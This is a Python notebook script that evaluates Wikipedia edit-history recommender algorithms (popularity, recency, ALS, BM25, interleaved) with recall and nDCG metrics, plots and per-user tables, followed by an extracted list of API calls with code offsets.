intrecs = intrec.recommend_all(K, [recs['Recent'], recs['bm25_filtered']])
wr.save_pickle(intrecs, "../" + rec_name +"_recs.pickle")
# -
results[rec_name] = wr.get_recs_metrics(
histories_dev, intrecs, K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
# # Report on evaluations results
# ## Hard coded metrics
# +
results = {}
results["Popularity"] = {'recall': 0.16187274312040842,
'ndcg': 0.0005356797596941751,
'resurfaced': 0.6213422985929523,
'recall_discover': 0.11947959996459864,
'recall_resurface': 0.2624396388830569,
'ndcg_discover': 0.000410354483750028,
'ndcg_resurface': 0.0008329819416998272}
results["Recent"] = {'recall': 22.618602913709378,
'ndcg': 0.14306080818547054,
'resurfaced': 71.13808990163118,
'recall_discover': 0.03982653332153288,
'recall_resurface': 76.18097837497375,
'ndcg_discover': 0.00011494775493754298,
'ndcg_resurface': 0.4821633227780786}
results["Frequent"] = {'recall': 20.834889802017184,
'ndcg': 0.11356953338215306,
'resurfaced': 76.10353629684971,
'recall_discover': 0.035401362952473675,
'recall_resurface': 70.17635943732941,
'ndcg_discover': 9.90570471847343e-05,
'ndcg_resurface': 0.38274923359395385}
results["ALS"] = {'recall': 5.488108579255385,
'ndcg': 0.026193145556306998,
'resurfaced': 16.251556468683848,
'recall_discover': 1.146119125586335,
'recall_resurface': 15.788368675204703,
'ndcg_discover': 0.004817135435898367,
'ndcg_resurface': 0.0769022655123215}
results["ALS_filtered"] = {'recall': 0.9027518366330469,
'ndcg': 0.003856703716094881,
'resurfaced': 0.0,
'recall_discover': 1.2832994070271706,
'recall_resurface': 0.0,
'ndcg_discover': 0.005482465270193466,
'ndcg_resurface': 0.0}
results["BM25"] = {'recall': 18.945336819823186,
'ndcg': 0.1015175508656068,
'resurfaced': 74.0469742248786,
'recall_discover': 1.3939286662536507,
'recall_resurface': 60.581566239764854,
'ndcg_discover': 0.004204510293040833,
'ndcg_resurface': 0.332367864833573}
results["BM25_filtered"] = {'recall': 1.8148424853691942,
'ndcg': 0.008622285155255174,
'resurfaced': 0.14848711243929774,
'recall_discover': 2.522347110363749,
'recall_resurface': 0.1364686122191896,
'ndcg_discover': 0.011740495141426633,
'ndcg_resurface': 0.0012251290280766518}
results["Interleaved"] = {'recall': 21.382766778732414,
'ndcg': 0.12924273396038563,
'resurfaced': 42.478676379031256,
'recall_discover': 1.8364457031595716,
'recall_resurface': 67.75141717404996,
'ndcg_discover': 0.006943981897312752,
'ndcg_resurface': 0.4193652616867473}
results_df = pd.DataFrame(results).T
results_df.reset_index(inplace=True)
# -
# ## Table of results
results_df
# ### FIG Table for post
# +
def scatter_text(x, y, text_column, data, title, xlabel, ylabel):
"""Scatter plot with country codes on the x y coordinates
Based on this answer: https://stackoverflow.com/a/54789170/2641825"""
# Create the scatter plot
p1 = sns.scatterplot(x, y, data=data, size = 8, legend=False)
# Add text besides each point
for line in range(0,data.shape[0]):
p1.text(data[x][line]+0.01, data[y][line],
data[text_column][line], horizontalalignment='left',
size='medium', color='black', weight='semibold')
# Set title and axis labels
plt.title(title)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
return p1
def highlight_max(s):
'''
highlight the maximum in a Series yellow.
'''
is_max = s == s.max()
return ['background-color: yellow' if v else '' for v in is_max]
results_df.sort_values("recall", ascending=False).style.apply(highlight_max, subset=["recall",
"ndcg",
"resurfaced",
"recall_discover",
"recall_resurface",
"ndcg_discover",
"ndcg_resurface",]).format({"recall": "{:.1f}%",
"ndcg": "{:.3f}",
"resurfaced": "{:.1f}%",
"recall_discover": "{:.1f}%",
"recall_resurface": "{:.1f}%",
"ndcg_discover": "{:.3f}",
"ndcg_resurface": "{:.3f}",
})
# -
colnames = ["Recommender", "Recall@20", "nDCG@20","Resurfaced","Recall@20 discovery","Recall@20 resurface","nDCG@20 discovery","nDCG@20 resurface"]
#apply(highlight_max, subset=colnames[1:]).
results_df.columns = colnames
results_df.sort_values("Recall@20", ascending=False).style.\
format({"Recall@20": "{:.1f}%",
"nDCG@20": "{:.3f}",
"Resurfaced": "{:.1f}%",
"Recall@20 discovery": "{:.1f}%",
"Recall@20 resurface": "{:.1f}%",
"nDCG@20 discovery": "{:.3f}",
"nDCG@20 resurface": "{:.3f}",
})
# ## Scatter plots (resurface vs discover)
fig = px.scatter(data_frame=results_df,
x='ndcg_discover',
y='ndcg_resurface',
hover_name='index')
# hover_name='title',)
fig.show()
fig = px.scatter(data_frame=results_df,
x='recall_discover',
y='recall_resurface',
hover_name='index')
# hover_name='title',)
fig.show()
# ### FIG Scatterplot for post
x = 2*[results_df.loc[results_df.Recommender == "Interleaved","Recall@20 resurface"].values[0]]
y = [0, results_df.loc[results_df.Recommender == "Interleaved","Recall@20 discovery"].values[0]]
# +
sns.set_theme(style="darkgrid")
matplotlib.rcParams.update({'font.size': 48, 'figure.figsize':(8,5), 'legend.edgecolor':'k'})
plt.figure(figsize=(12,7))
A = results_df.loc[:,'Recall@20 discovery']
B = results_df.loc[:,'Recall@20 resurface']
x = 2*[results_df.loc[results_df.Recommender == "Interleaved","Recall@20 discovery"].values[0]]
y = [-1, results_df.loc[results_df.Recommender == "Interleaved","Recall@20 resurface"].values[0]]
plt.plot(x,y,":k")
x[0] = 0
y[0] = y[1]
# plt.rcParams.update({'font.size': 48})
plt.rc('xtick', labelsize=3)
font = {'family' : 'normal',
'weight' : 'normal',
'size' : 22}
matplotlib.rc('font', **font)
plt.plot(x,y,":k")
plt.plot(A,B,'.', MarkerSize=15)
for xyz in zip(results_df.Recommender, A, B): # <--
plt.gca().annotate('%s' % xyz[0], xy=np.array(xyz[1:])+(0.05,0), textcoords='data', fontsize=18) # <--
for tick in plt.gca().xaxis.get_major_ticks():
tick.label.set_fontsize(20)
for tick in plt.gca().yaxis.get_major_ticks():
tick.label.set_fontsize(20)
plt.xlabel("Recall@20 discovery (%)",fontsize=20)
plt.ylabel("Recall@20 resurface (%)",fontsize=20)
plt.xlim([0,3])
plt.ylim([-2,85])
axes = plt.gca()
# -
# ## Read recs in from files
recommender_names = ['Popularity', 'Recent', 'Frequent', 'ALS', 'ALS_filtered', 'BM25', 'BM25_filtered', 'Interleaved']
recs = {rname:wr.load_pickle("../" + rname + "_recs.pickle") for rname in recommender_names}
# ## Recall curves
histories_dev = feather.read_feather('../histories_dev_2021-05-28.feather')
plt.figure(figsize=(15,10))
for rname in recommender_names:
recall_curve = wr.recall_curve(histories_dev, recs[rname], 20)
# print(recall_curve[-1])
plt.plot(recall_curve,'.-')
plt.legend(recommender_names)
plt.figure(figsize=(15,10))
for rname in recommender_names:
recall_curve = wr.recall_curve(histories_dev, recs[rname], 20, discovery_userids)
plt.plot(recall_curve,'.-')
plt.legend(recommender_names)
plt.figure(figsize=(15,10))
for rname in recommender_names:
recall_curve = wr.recall_curve(histories_dev, recs[rname], 20, resurface_userids)
plt.plot(recall_curve,'.-')
plt.legend(recommender_names)
# ### FIG Implicit vs BM25 figure
sns.set_theme(style="darkgrid")
matplotlib.rcParams.update({'font.size': 18, 'figure.figsize':(8,5), 'legend.edgecolor':'k'})
plt.figure(figsize=(10,6))
for rname in ["ALS","BM25"]:
recall_curve = wr.recall_curve(histories_dev, recs[rname], 20, discovery_userids)
plt.plot(np.array(recall_curve)*100,'.-',markersize=12)
plt.legend( ["ALS","BM25"],title="Algorithm", fontsize=16, title_fontsize=16, facecolor="w")
plt.xlabel("@N",fontsize=20)
plt.ylabel("Discovery recall (%)",fontsize=20)
_ = plt.xticks(np.arange(0,20,2),np.arange(0,20,2)+1)
# plt.gca().legend(prop=dict(size=20))
for tick in plt.gca().xaxis.get_major_ticks():
tick.label.set_fontsize(20)
for tick in plt.gca().yaxis.get_major_ticks():
tick.label.set_fontsize(20)
# # User recommendation comparison
recs_subset = ["Recent","Frequent","Popularity","Implicit","bm25","interleaved"]
print("Next edit: " + histories_dev.loc[histories_dev.userid == userid].title.values[0])
# ## FIG Rama table
# +
def bold_viewed(val, viewed_pages):
"""
Takes a scalar and returns a string with
the css property `'color: red'` for negative
strings, black otherwise.
"""
weight = 'bold' if val in viewed_pages else 'normal'
return 'font-weight: %s' % weight
def color_target(val, target_page):
"""
Takes a scalar and returns a string with
the css property `'color: red'` for negative
strings, black otherwise.
"""
color = 'red' if val == target_page else 'black'
return 'color: %s' % color
def display_user_recs_comparison(user_name, recs, recs_subset, train_set, test_set, N=20):
userid = n2u[user_name]
recs_table = pd.DataFrame({rec_name: [p2t[r] for r in recs[rec_name][userid][:N]] for rec_name in recs_subset})
recs_table = recs_table.reset_index()
recs_table.loc[:,"index"] = recs_table.loc[:,"index"]+1
recs_table = recs_table.rename(columns={"index":""})
viewed_pages = train_set.loc[train_set.userid == userid,["title"]].drop_duplicates(subset=["title"]).values.squeeze()
target_page = test_set.loc[test_set.userid == userid].title.values[0]
# print("Next edit: " + target_page)
s = recs_table.style.applymap(bold_viewed, viewed_pages=viewed_pages).applymap(color_target, target_page=target_page)
display(s)
# +
recs_subset = ["Recent","Frequent","Popularity","ALS","ALS_filtered","BM25","BM25_filtered"]
display_user_recs_comparison('Rama', recs, recs_subset, histories_train, histories_dev, N=10)
# -
# ## Other individuals tables
display_user_recs_comparison('Meow', recs, recs_subset, histories_train, histories_dev, N=10)
display_user_recs_comparison('KingArti', recs, recs_subset, histories_train, histories_dev, N=10)
display_user_recs_comparison('Tulietto', recs, recs_subset, histories_train, histories_dev, N=10)
display_user_recs_comparison('Thornstrom', recs, recs_subset, histories_train, histories_dev, N=10)
# ## FIG Interleaved
display_user_recs_comparison('Rama', recs,['Interleaved'], histories_train, histories_dev, N=10)
display_user_recs_comparison('KingArti', recs,['Interleaved'], histories_train, histories_dev, N=10)
N = 20
display(pd.DataFrame({rec_name: [p2t[r] for r in recs[rec_name][n2u['HenryXVII']]][:N] for rec_name in recs_subset}))
persons_of_interest = [
"DoctorWho42",
"AxelSjögren",
"<NAME>",
"Tulietto",
"LipaCityPH",
"<NAME>",
"Thornstrom",
"Meow",
"HyprMarc",
"Jampilot",
"Rama"
]
N=10
irec_500 = recommenders.ImplicitCollaborativeRecommender(model, implicit_matrix)
irecs_poi = irec_500.recommend_all([n2u[user_name] for user_name in persons_of_interest], N, u2i=u2i, n2i=n2i, i2p=i2p)
# # Find interesting users
# +
edited_pages = clean_histories.drop_duplicates(subset=['title','user']).groupby('user').userid.count()
edited_pages = edited_pages[edited_pages > 50]
edited_pages = edited_pages[edited_pages < 300]
# -
clean_histories.columns
display_user_recs_comparison("Rama", recs, recs_subset, histories_train, histories_dev, N=20)
# +
index = list(range(len(edited_pages)))
np.random.shuffle(index)
for i in index[:10]:
user_name = edited_pages.index[i]
print(user_name)
display_user_recs_comparison(user_name, recs, recs_subset, histories_train, histories_dev, N=20)
print("\n\n\n")
# +
index = list(range(len(edited_pages)))
np.random.shuffle(index)
for i in index[:10]:
print(edited_pages.index[i])
display_user_recs_comparison
wr.print_user_history(user=edited_pages.index[i],all_histories=clean_histories)
print("\n\n\n")
# -
sns.distplot(edited_pages,kde=False,bins=np.arange(0,2000,20))
# # Repetition analysis
import itertools
clean_histories.head()
clean_histories.iloc[:1000].values.tolist()
df = clean_histories
dict(zip(df.columns, range(len(df.columns))))
def identify_runs(df):
d = df.loc[:,['userid','pageid']].values.tolist()
return [(k, len(list(g))) for k,g in itertools.groupby(d)]
# %%time
runs = identify_runs(clean_histories)
# +
lens = np.array([r[1] for r in runs])
single_edits = np.sum(lens==1)
total_edits = len(clean_histories)
print("Percent of edits that are part of a run: %.1f%%" % (100*(1-(float(single_edits)/total_edits))))
print("Percent of edits that are repetitions: %.1f%%" % (100*(1-len(runs)/total_edits)))
|
[
"matplotlib.pyplot.title",
"matplotlib.rc",
"numpy.sum",
"wikirecs.display_recs_with_history",
"wikirecs.print_user_history",
"recommenders.ImplicitCollaborativeRecommender",
"recommenders.MostRecentRecommender",
"recommenders.MostFrequentRecommender",
"matplotlib.pyplot.figure",
"numpy.arange",
"wikirecs.recall",
"matplotlib.pyplot.gca",
"wikirecs.get_recs_metrics",
"implicit.als.AlternatingLeastSquares",
"pandas.set_option",
"plotly.express.scatter",
"recommenders.InterleaveRecommender",
"pandas.DataFrame",
"pyarrow.feather.read_feather",
"matplotlib.rcParams.update",
"scipy.sparse.coo_matrix",
"matplotlib.pyplot.rc",
"pandas.concat",
"seaborn.set_theme",
"numpy.random.shuffle",
"matplotlib.pyplot.ylim",
"seaborn.scatterplot",
"numpy.median",
"matplotlib.pyplot.legend",
"pyarrow.feather.write_feather",
"wikirecs.get_resurface_discovery",
"umap.UMAP",
"wikirecs.save_pickle",
"recommenders.PopularityRecommender",
"wikirecs.recall_curve",
"itertools.groupby",
"matplotlib.pyplot.ylabel",
"wikirecs.load_pickle",
"recommenders.JaccardRecommender",
"os.listdir",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.xlim",
"logging.basicConfig",
"pull_edit_histories.get_edit_history",
"implicit.nearest_neighbours.BM25Recommender",
"matplotlib.pyplot.plot",
"recommenders.MyBM25Recommender",
"wikirecs.dataframe_set_subtract",
"scipy.sparse.csc_matrix",
"numpy.array",
"implicit.nearest_neighbours.bm25_weight",
"matplotlib.pyplot.xlabel",
"itables.javascript.load_datatables",
"logging.getLogger",
"wikirecs.prop_resurface"
] |
[((1071, 1088), 'itables.javascript.load_datatables', 'load_datatables', ([], {}), '()\n', (1086, 1088), False, 'from itables.javascript import load_datatables\n'), ((1109, 1147), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', '(100)'], {}), "('display.max_rows', 100)\n", (1122, 1147), True, 'import pandas as pd\n'), ((1148, 1186), 'pandas.set_option', 'pd.set_option', (['"""display.min_rows"""', '(100)'], {}), "('display.min_rows', 100)\n", (1161, 1186), True, 'import pandas as pd\n'), ((1207, 1228), 'logging.basicConfig', 'logging.basicConfig', ([], {}), '()\n', (1226, 1228), False, 'import logging\n'), ((1356, 1395), 'os.listdir', 'os.listdir', (['"""edit_histories_2021-05-28"""'], {}), "('edit_histories_2021-05-28')\n", (1366, 1395), False, 'import os\n'), ((1539, 1582), 'pandas.concat', 'pd.concat', (['all_histories'], {'ignore_index': '(True)'}), '(all_histories, ignore_index=True)\n', (1548, 1582), True, 'import pandas as pd\n'), ((1584, 1656), 'pyarrow.feather.write_feather', 'feather.write_feather', (['all_histories', '"""all_histories_2021-05-28.feather"""'], {}), "(all_histories, 'all_histories_2021-05-28.feather')\n", (1605, 1656), False, 'from pyarrow import feather\n'), ((1683, 1739), 'pyarrow.feather.read_feather', 'feather.read_feather', (['"""all_histories_2021-05-28.feather"""'], {}), "('all_histories_2021-05-28.feather')\n", (1703, 1739), False, 'from pyarrow import feather\n'), ((1887, 1943), 'pyarrow.feather.read_feather', 'feather.read_feather', (['"""all_histories_2021-05-28.feather"""'], {}), "('all_histories_2021-05-28.feather')\n", (1907, 1943), False, 'from pyarrow import feather\n'), ((2782, 2809), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(20, 8)'}), '(figsize=(20, 8))\n', (2792, 2809), True, 'import matplotlib.pyplot as plt\n'), ((2809, 2829), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\n', (2820, 2829), True, 'import matplotlib.pyplot as plt\n'), ((2892, 2929), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Number of edits by user"""'], {}), "('Number of edits by user')\n", (2902, 2929), True, 'import matplotlib.pyplot as plt\n'), ((2930, 2950), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\n', (2941, 2950), True, 'import matplotlib.pyplot as plt\n'), ((3009, 3027), 'matplotlib.pyplot.xlim', 'plt.xlim', (['[0, 200]'], {}), '([0, 200])\n', (3017, 3027), True, 'import matplotlib.pyplot as plt\n'), ((3027, 3064), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Number of edits by user"""'], {}), "('Number of edits by user')\n", (3037, 3064), True, 'import matplotlib.pyplot as plt\n'), ((3175, 3202), 'numpy.sum', 'np.sum', (['(edit_counts > thres)'], {}), '(edit_counts > thres)\n', (3181, 3202), True, 'import numpy as np\n'), ((3750, 3789), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', '(1000)'], {}), "('display.max_rows', 1000)\n", (3763, 3789), True, 'import pandas as pd\n'), ((7057, 7136), 'pyarrow.feather.write_feather', 'feather.write_feather', (['clean_histories', '"""../clean_histories_2021-05-28.feather"""'], {}), "(clean_histories, '../clean_histories_2021-05-28.feather')\n", (7078, 7136), False, 'from pyarrow import feather\n'), ((7191, 7252), 'pyarrow.feather.read_feather', 'feather.read_feather', (['"""../clean_histories_2021-05-28.feather"""'], {}), "('../clean_histories_2021-05-28.feather')\n", (7211, 7252), False, 'from pyarrow import feather\n'), ((8253, 8371), 'wikirecs.save_pickle', 'wr.save_pickle', (['(p2t, t2p, u2n, n2u, p2i, u2i, i2p, i2u, n2i, t2i, i2n, i2t)', '"""../lookup_tables_2021-05-28.pickle"""'], {}), "((p2t, t2p, u2n, n2u, p2i, u2i, i2p, i2u, n2i, t2i, i2n, i2t),\n '../lookup_tables_2021-05-28.pickle')\n", (8267, 8371), True, 'import wikirecs as wr\n'), ((8369, 8443), 'wikirecs.save_pickle', 'wr.save_pickle', (['(userids, pageids)', '"""../users_and_pages_2021-05-28.pickle"""'], {}), "((userids, pageids), '../users_and_pages_2021-05-28.pickle')\n", (8383, 8443), True, 'import wikirecs as wr\n'), ((8542, 8594), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../lookup_tables_2021-05-28.pickle"""'], {}), "('../lookup_tables_2021-05-28.pickle')\n", (8556, 8594), True, 'import wikirecs as wr\n'), ((8614, 8668), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../users_and_pages_2021-05-28.pickle"""'], {}), "('../users_and_pages_2021-05-28.pickle')\n", (8628, 8668), True, 'import wikirecs as wr\n'), ((8882, 8940), 'wikirecs.dataframe_set_subtract', 'wr.dataframe_set_subtract', (['clean_histories', 'histories_test'], {}), '(clean_histories, histories_test)\n', (8907, 8940), True, 'import wikirecs as wr\n'), ((9217, 9274), 'wikirecs.dataframe_set_subtract', 'wr.dataframe_set_subtract', (['histories_train', 'histories_dev'], {}), '(histories_train, histories_dev)\n', (9242, 9274), True, 'import wikirecs as wr\n'), ((9870, 9949), 'pyarrow.feather.write_feather', 'feather.write_feather', (['histories_train', '"""../histories_train_2021-05-28.feather"""'], {}), "(histories_train, '../histories_train_2021-05-28.feather')\n", (9891, 9949), False, 'from pyarrow import feather\n'), ((9950, 10025), 'pyarrow.feather.write_feather', 'feather.write_feather', (['histories_dev', '"""../histories_dev_2021-05-28.feather"""'], {}), "(histories_dev, '../histories_dev_2021-05-28.feather')\n", (9971, 10025), False, 'from pyarrow import feather\n'), ((10026, 10103), 'pyarrow.feather.write_feather', 'feather.write_feather', (['histories_test', '"""../histories_test_2021-05-28.feather"""'], {}), "(histories_test, '../histories_test_2021-05-28.feather')\n", (10047, 10103), False, 'from pyarrow import feather\n'), ((10148, 10206), 'wikirecs.get_resurface_discovery', 'wr.get_resurface_discovery', (['histories_train', 'histories_dev'], {}), '(histories_train, histories_dev)\n', (10174, 10206), True, 'import wikirecs as wr\n'), ((10499, 10607), 'wikirecs.save_pickle', 'wr.save_pickle', (['(resurface_userids, discovery_userids)', '"""../resurface_discovery_users_2021-05-28.pickle"""'], {}), "((resurface_userids, discovery_userids),\n '../resurface_discovery_users_2021-05-28.pickle')\n", (10513, 10607), True, 'import wikirecs as wr\n'), ((10943, 11066), 'pull_edit_histories.get_edit_history', 'get_edit_history', ([], {'user': '"""Thornstrom"""', 'latest_timestamp': '"""2021-05-28T22:02:09Z"""', 'earliest_timestamp': '"""2020-05-28T22:02:09Z"""'}), "(user='Thornstrom', latest_timestamp='2021-05-28T22:02:09Z',\n earliest_timestamp='2020-05-28T22:02:09Z')\n", (10959, 11066), False, 'from pull_edit_histories import get_edit_history\n'), ((11170, 11219), 'wikirecs.print_user_history', 'wr.print_user_history', (['all_histories'], {'user': '"""Rama"""'}), "(all_histories, user='Rama')\n", (11191, 11219), True, 'import wikirecs as wr\n'), ((11221, 11270), 'wikirecs.print_user_history', 'wr.print_user_history', (['all_histories'], {'user': '"""Meow"""'}), "(all_histories, user='Meow')\n", (11242, 11270), True, 'import wikirecs as wr\n'), ((11592, 11646), 'numpy.array', 'np.array', (['[p2i[p] for p in for_implicit.pageid.values]'], {}), '([p2i[p] for p in for_implicit.pageid.values])\n', (11600, 11646), True, 'import numpy as np\n'), ((11653, 11707), 'numpy.array', 'np.array', (['[u2i[u] for u in for_implicit.userid.values]'], {}), '([u2i[u] for u in for_implicit.userid.values])\n', (11661, 11707), True, 'import numpy as np\n'), ((11731, 11782), 'scipy.sparse.coo_matrix', 'coo_matrix', (['(for_implicit.edits.values, (row, col))'], {}), '((for_implicit.edits.values, (row, col)))\n', (11741, 11782), False, 'from scipy.sparse import csr_matrix, csc_matrix, lil_matrix, coo_matrix\n'), ((11803, 11834), 'scipy.sparse.csc_matrix', 'csc_matrix', (['implicit_matrix_coo'], {}), '(implicit_matrix_coo)\n', (11813, 11834), False, 'from scipy.sparse import csr_matrix, csc_matrix, lil_matrix, coo_matrix\n'), ((11849, 11920), 'wikirecs.save_pickle', 'wr.save_pickle', (['implicit_matrix', '"""../implicit_matrix_2021-05-28.pickle"""'], {}), "(implicit_matrix, '../implicit_matrix_2021-05-28.pickle')\n", (11863, 11920), True, 'import wikirecs as wr\n'), ((11974, 12028), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../implicit_matrix_2021-05-28.pickle"""'], {}), "('../implicit_matrix_2021-05-28.pickle')\n", (11988, 12028), True, 'import wikirecs as wr\n'), ((12726, 12780), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../implicit_matrix_2021-05-28.pickle"""'], {}), "('../implicit_matrix_2021-05-28.pickle')\n", (12740, 12780), True, 'import wikirecs as wr\n'), ((12842, 12894), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../lookup_tables_2021-05-28.pickle"""'], {}), "('../lookup_tables_2021-05-28.pickle')\n", (12856, 12894), True, 'import wikirecs as wr\n'), ((12910, 12954), 'implicit.nearest_neighbours.bm25_weight', 'bm25_weight', (['implicit_matrix'], {'K1': '(100)', 'B': '(0.25)'}), '(implicit_matrix, K1=100, B=0.25)\n', (12921, 12954), False, 'from implicit.nearest_neighbours import bm25_weight\n'), ((13044, 13137), 'implicit.als.AlternatingLeastSquares', 'implicit.als.AlternatingLeastSquares', ([], {'factors': 'num_factors', 'regularization': 'regularization'}), '(factors=num_factors, regularization=\n regularization)\n', (13080, 13137), False, 'import implicit\n'), ((13163, 13228), 'wikirecs.save_pickle', 'wr.save_pickle', (['model', "('../als%d_bm25_model.pickle' % num_factors)"], {}), "(model, '../als%d_bm25_model.pickle' % num_factors)\n", (13177, 13228), True, 'import wikirecs as wr\n'), ((13237, 13293), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../als200_bm25_model_2021-05-28.pickle"""'], {}), "('../als200_bm25_model_2021-05-28.pickle')\n", (13251, 13293), True, 'import wikirecs as wr\n'), ((13741, 13789), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../implicit_grid_search.pickle"""'], {}), "('../implicit_grid_search.pickle')\n", (13755, 13789), True, 'import wikirecs as wr\n'), ((13791, 13824), 'pandas.DataFrame', 'pd.DataFrame', (['grid_search_results'], {}), '(grid_search_results)\n', (13803, 13824), True, 'import pandas as pd\n'), ((14076, 14129), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../implicit_grid_search_bm25.pickle"""'], {}), "('../implicit_grid_search_bm25.pickle')\n", (14090, 14129), True, 'import wikirecs as wr\n'), ((14462, 14502), 'implicit.nearest_neighbours.bm25_weight', 'bm25_weight', (['implicit_matrix'], {'K1': '(20)', 'B': '(1)'}), '(implicit_matrix, K1=20, B=1)\n', (14473, 14502), False, 'from implicit.nearest_neighbours import bm25_weight\n'), ((14747, 14769), 'implicit.nearest_neighbours.BM25Recommender', 'BM25Recommender', (['K1', 'B'], {}), '(K1, B)\n', (14762, 14769), False, 'from implicit.nearest_neighbours import BM25Recommender\n'), ((14798, 14851), 'wikirecs.save_pickle', 'wr.save_pickle', (['model', '"""../bm25_model_2021-05-28.pkl"""'], {}), "(model, '../bm25_model_2021-05-28.pkl')\n", (14812, 14851), True, 'import wikirecs as wr\n'), ((15881, 15922), 'wikirecs.save_pickle', 'wr.save_pickle', (['model', '"""b25_model.pickle"""'], {}), "(model, 'b25_model.pickle')\n", (15895, 15922), True, 'import wikirecs as wr\n'), ((15932, 15966), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""b25_model.pickle"""'], {}), "('b25_model.pickle')\n", (15946, 15966), True, 'import wikirecs as wr\n'), ((16231, 16279), 'wikirecs.print_user_history', 'wr.print_user_history', (['clean_histories'], {'userid': 'u'}), '(clean_histories, userid=u)\n', (16252, 16279), True, 'import wikirecs as wr\n'), ((16568, 16608), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../als150_model.pickle"""'], {}), "('../als150_model.pickle')\n", (16582, 16608), True, 'import wikirecs as wr\n'), ((17024, 17052), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (17034, 17052), True, 'import matplotlib.pyplot as plt\n'), ((17052, 17099), 'matplotlib.pyplot.plot', 'plt.plot', (['embedding[:, 0]', 'embedding[:, 1]', '"""."""'], {}), "(embedding[:, 0], embedding[:, 1], '.')\n", (17060, 17099), True, 'import matplotlib.pyplot as plt\n'), ((18470, 18582), 'plotly.express.scatter', 'px.scatter', ([], {'data_frame': 'emb_df', 'x': '"""dim1"""', 'y': '"""dim2"""', 'hover_name': '"""title"""', 'color': 'key', 'hover_data': "['edit_count']"}), "(data_frame=emb_df, x='dim1', y='dim2', hover_name='title', color\n =key, hover_data=['edit_count'])\n", (18480, 18582), True, 'import plotly.express as px\n'), ((19111, 19236), 'plotly.express.scatter', 'px.scatter', ([], {'data_frame': 'emb_df', 'x': '"""dim1"""', 'y': '"""dim2"""', 'hover_name': '"""title"""', 'color': '"""log_edit_count"""', 'hover_data': "['edit_count']"}), "(data_frame=emb_df, x='dim1', y='dim2', hover_name='title', color\n ='log_edit_count', hover_data=['edit_count'])\n", (19121, 19236), True, 'import plotly.express as px\n'), ((19516, 19577), 'pyarrow.feather.read_feather', 'feather.read_feather', (['"""../histories_train_2021-05-28.feather"""'], {}), "('../histories_train_2021-05-28.feather')\n", (19536, 19577), False, 'from pyarrow import feather\n'), ((19595, 19655), 'pyarrow.feather.read_feather', 'feather.read_feather', (['"""../histories_test_2021-05-28.feather"""'], {}), "('../histories_test_2021-05-28.feather')\n", (19615, 19655), False, 'from pyarrow import feather\n'), ((19672, 19731), 'pyarrow.feather.read_feather', 'feather.read_feather', (['"""../histories_dev_2021-05-28.feather"""'], {}), "('../histories_dev_2021-05-28.feather')\n", (19692, 19731), False, 'from pyarrow import feather\n'), ((19751, 19805), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../implicit_matrix_2021-05-28.pickle"""'], {}), "('../implicit_matrix_2021-05-28.pickle')\n", (19765, 19805), True, 'import wikirecs as wr\n'), ((19867, 19919), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../lookup_tables_2021-05-28.pickle"""'], {}), "('../lookup_tables_2021-05-28.pickle')\n", (19881, 19919), True, 'import wikirecs as wr\n'), ((19940, 19994), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../users_and_pages_2021-05-28.pickle"""'], {}), "('../users_and_pages_2021-05-28.pickle')\n", (19954, 19994), True, 'import wikirecs as wr\n'), ((20037, 20101), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../resurface_discovery_users_2021-05-28.pickle"""'], {}), "('../resurface_discovery_users_2021-05-28.pickle')\n", (20051, 20101), True, 'import wikirecs as wr\n'), ((20123, 20258), 'wikirecs.display_recs_with_history', 'wr.display_recs_with_history', (['recs', 'userids[:100]', 'histories_test', 'histories_train', 'p2t', 'u2n'], {'recs_to_display': '(5)', 'hist_to_display': '(10)'}), '(recs, userids[:100], histories_test,\n histories_train, p2t, u2n, recs_to_display=5, hist_to_display=10)\n', (20151, 20258), True, 'import wikirecs as wr\n'), ((20360, 20411), 'recommenders.PopularityRecommender', 'recommenders.PopularityRecommender', (['histories_train'], {}), '(histories_train)\n', (20394, 20411), False, 'import recommenders\n'), ((20451, 20507), 'wikirecs.save_pickle', 'wr.save_pickle', (['precs', "('../' + rec_name + '_recs.pickle')"], {}), "(precs, '../' + rec_name + '_recs.pickle')\n", (20465, 20507), True, 'import wikirecs as wr\n'), ((20534, 20647), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', 'precs', 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), '(histories_dev, precs, K, discovery_userids,\n resurface_userids, implicit_matrix, i2p, u2i)\n', (20553, 20647), True, 'import wikirecs as wr\n'), ((20727, 20778), 'recommenders.MostRecentRecommender', 'recommenders.MostRecentRecommender', (['histories_train'], {}), '(histories_train)\n', (20761, 20778), False, 'import recommenders\n'), ((20868, 20924), 'wikirecs.save_pickle', 'wr.save_pickle', (['rrecs', "('../' + rec_name + '_recs.pickle')"], {}), "(rrecs, '../' + rec_name + '_recs.pickle')\n", (20882, 20924), True, 'import wikirecs as wr\n'), ((20982, 21095), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', 'rrecs', 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), '(histories_dev, rrecs, K, discovery_userids,\n resurface_userids, implicit_matrix, 